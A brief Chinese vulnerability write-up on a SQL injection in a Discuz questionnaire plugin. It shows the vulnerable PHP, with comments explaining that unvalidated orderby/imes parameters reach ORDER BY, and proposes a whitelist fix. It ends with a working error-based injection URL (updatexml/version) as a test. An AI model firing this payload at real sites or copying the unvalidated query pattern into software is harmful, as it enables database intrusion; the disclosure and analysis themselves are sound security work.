Discuz问卷调查专业版插件注入

nds_ques_viewanswer.inc.php

<?PHP
// Excerpt of the plugin's "viewanswer" action as reproduced in the write-up. The "...." lines mark
// code the page omits, so $topicid, $perpage, $page and $start_limit are assigned outside this view
// and their sanitisation cannot be judged from here.

if(!defined('IN_DISCUZ')) {
        exit('Access Denied');
}
   // Author filter: the value is trimmed, cut to 20 bytes and run through dhtmlspecialchars()
   // (a Discuz helper not shown on this page) before being wrapped in single quotes in the WHERE
   // clause. NOTE(review): the guard tests $_G['gp_srchtxt'] but the value read is $_GET['srchtxt'];
   // if those can differ, the filter silently matches an empty author — confirm against how $_G is
   // populated. Whether dhtmlspecialchars() is sufficient as SQL escaping also depends on that helper
   // and the connection charset; a parameterised query would remove the dependency.
   !empty($_G['gp_srchtxt'])? $wherestr .= " AND  author = '".dhtmlspecialchars(trim(substr($_GET['srchtxt'],0,20)))."' " :'' ;
    // Sort column and direction are taken straight from the request with only a truthiness
    // fallback: no whitelist, no escaping, no type check. These two values are what the write-up's
    // injection travels through (see the ORDER BY below).
    $orderby = $_G['gp_orderby']? $_G['gp_orderby']:'dateline';// read request parameters
    $imes = $_G['gp_imes']? $_G['gp_imes']:'DESC';
    // $topicid is interpolated into the query; its origin is not visible in this excerpt.
    $questopics = DB::fetch_first("SELECT * FROM ".DB::table('ques_topic')." WHERE `topicid`='$topicid'");
    $sysmode = $questopics['ques_mode'];
           ....
                $magiccount =  DB::result(DB::query("SELECT COUNT(*) FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' LIMIT 1"), 0);
                   // The unvalidated $orderby/$imes are also echoed into the pagination link;
                   // whether multi() escapes them for HTML is not visible here — worth checking.
                   $multipage = multi($magiccount, $perpage, $page, "plugin.php?id=nds_up_ques:nds_up_ques&action=viewanswer&topicid=".$topicid."&orderby=".$orderby."&imes=".$imes);
                $topiclist = '';
                $nid = $start_limit+1;
        // Injection point: $orderby and $imes are interpolated unquoted into ORDER BY, so a
        // request-supplied value becomes SQL syntax (ORDER BY cannot be bound as a parameter).
        // Mitigation: accept $orderby only from a fixed list of column names and $imes only as
        // 'ASC'/'DESC' (in_array(..., true)), falling back to the defaults otherwise, and cast
        // $topicid, $start_limit and $perpage to int before they reach the query.
        $query = DB::query(" SELECT * FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' ".$wherestr."  ORDER by $orderby $imes LIMIT $start_limit,$perpage");// fed into the query
....

?>

测试方式:

/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--

sql
